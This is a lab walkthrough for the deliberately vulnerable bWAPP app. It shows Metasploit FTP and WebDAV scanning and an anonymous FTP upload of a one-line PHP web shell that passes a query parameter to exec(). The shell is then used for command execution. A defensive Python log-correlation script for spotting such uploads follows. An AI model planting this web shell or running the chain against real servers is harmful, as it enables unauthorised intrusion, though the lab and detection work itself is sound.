The video shows how to exploit bWAPP through FTP and WebDAV using the Metasploit Framework. Here are the steps:
- First, run nmap and closely verify all the services
- Run Metasploit Framework, exploit WebDAV, and enable it
- Run FTP, log in, and upload your backdoor
- Access your backdoor through a web browser and get a reverse shell

# msfconsole
msf > search ftp_login
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit
msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:
ftp> ls
ftp> put backdoor.php

backdoor.php code:
<?php
// Passes the "x" query parameter to exec() and prints the result
print_r(($_GET['x'])?exec($_GET['x']):'');
?>

Address Bar:
192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd
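
From the defender's side, the chain above leaves two traces that can be joined: an anonymous FTP upload of a script file, then HTTP requests that run it. The following is an added example, not part of the original walkthrough. It assumes vsftpd's native log format and Apache's combined access log; the log lines, client addresses and function names are constructed for illustration.

```python
import re
from posixpath import basename
from urllib.parse import urlsplit, parse_qsl

# Constructed sample logs (not from the page). Formats assumed: vsftpd's
# native log and the Apache "combined" access log.
FTP_LOG = [
    'Mon Jan  6 10:15:02 2025 [pid 2345] [ftp] OK LOGIN: Client "192.0.2.10", anon password "?"',
    'Mon Jan  6 10:15:09 2025 [pid 2347] [ftp] OK UPLOAD: Client "192.0.2.10", "/webdav/backdoor.php", 52 bytes, 1.20Kbyte/sec',
    'Mon Jan  6 10:20:44 2025 [pid 2390] [alice] OK UPLOAD: Client "192.0.2.20", "/docs/report.pdf", 48211 bytes, 310.00Kbyte/sec',
]
HTTP_LOG = [
    '192.0.2.10 - - [06/Jan/2025:10:15:40 +0000] "GET /webdav/backdoor.php?x=ls HTTP/1.1" 200 87 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Jan/2025:10:15:52 +0000] "GET /webdav/backdoor.php?x=pwd HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [06/Jan/2025:10:16:03 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

UPLOAD_RE = re.compile(r'\[(?P<user>[^\]]+)\] OK UPLOAD: Client "(?P<ip>[^"]+)", "(?P<path>[^"]+)"')
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SCRIPT_EXT = ('.php', '.phtml', '.php5', '.phar')
ANON_USERS = {'ftp', 'anonymous'}  # vsftpd logs anonymous sessions as [ftp]

def anonymous_script_uploads(ftp_lines):
    """Map file name -> uploader IP for server-side scripts uploaded anonymously."""
    found = {}
    for line in ftp_lines:
        m = UPLOAD_RE.search(line)
        if m and m['user'] in ANON_USERS and m['path'].lower().endswith(SCRIPT_EXT):
            found[basename(m['path'])] = m['ip']
    return found

def correlate(ftp_lines, http_lines):
    """Return served requests for scripts uploaded anonymously (matched by file name)."""
    uploads = anonymous_script_uploads(ftp_lines)
    hits = []
    for line in http_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        name = basename(url.path)
        if name in uploads and m['status'] == '200':
            hits.append({'client': m['ip'], 'path': url.path, 'uploader': uploads[name],
                         'params': dict(parse_qsl(url.query))})
    return hits

if __name__ == '__main__':
    for hit in correlate(FTP_LOG, HTTP_LOG):
        print(hit)
```

Matching on file name alone can produce false positives when unrelated directories hold files with the same name; mapping the FTP root to its web path tightens the join.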